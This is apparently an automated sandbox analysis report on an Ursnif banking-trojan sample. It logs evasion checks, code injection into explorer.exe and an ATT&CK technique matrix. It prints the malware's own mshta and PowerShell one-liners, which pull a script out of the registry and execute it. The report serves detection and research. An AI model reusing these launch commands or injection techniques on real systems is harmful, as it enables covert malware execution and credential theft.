Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3455
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5616

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 204	Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980	Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980	Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980	Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980	Thread sleep count: 70 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -7378697629483816s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,

Source: C:\Windows\SysWOW64\regsvr32.exe

Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.975003491.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FC16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.0.cs

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9F0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 3110000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 5876
Source: C:\Windows\explorer.exe	Thread register set: target process: 6272
Source: C:\Windows\explorer.exe	Thread register set: target process: 4112

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9F0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3110000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000024.00000000.955462223.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000024.00000000.974965650.0000000005E50000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FB04D7 cpuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FBB585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FBCF2A GetSystemTimeAsFileTime,HeapFree,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FA3DD8 GetVersion,GetLastError,

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information2	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing1	Input Capture1	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
